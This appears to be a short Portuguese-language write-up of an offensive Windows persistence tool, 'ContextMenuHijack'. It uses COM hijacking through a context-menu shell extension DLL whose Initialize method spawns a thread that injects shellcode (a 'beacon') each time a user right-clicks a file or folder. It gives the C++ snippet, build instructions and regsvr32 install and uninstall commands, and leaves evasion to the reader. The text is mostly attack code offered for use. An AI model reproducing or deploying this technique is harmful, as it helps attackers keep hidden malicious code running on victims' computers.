
Execute um payload a cada clique com o botão direito em um arquivo/pasta no menu do Explorador para persistência
Esta ideia original que me inspirou é de @NinjaParanoid:
ContextMenuHijack é uma técnica de persistência simples que utiliza COM hijacking baseado no comportamento humano: quando você clica com o botão direito em um arquivo/pasta no Explorador de Arquivos para abrir o Menu de Contexto, ele executa ao mesmo tempo o beacon que especificamos.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}
Você só precisa carregar o arquivo de solução (.sln) e compilá-lo. É importante saber que você precisa de privilégios de administrador para usar esta técnica de persistência. Depois de fazer tudo isso, basta registrar o arquivo DLL no registro com regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"
se você quiser desinstalá-lo, basta usar a flag
/u
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

explorer.exe, cabe a você usar suas próprias técnicas de evasão
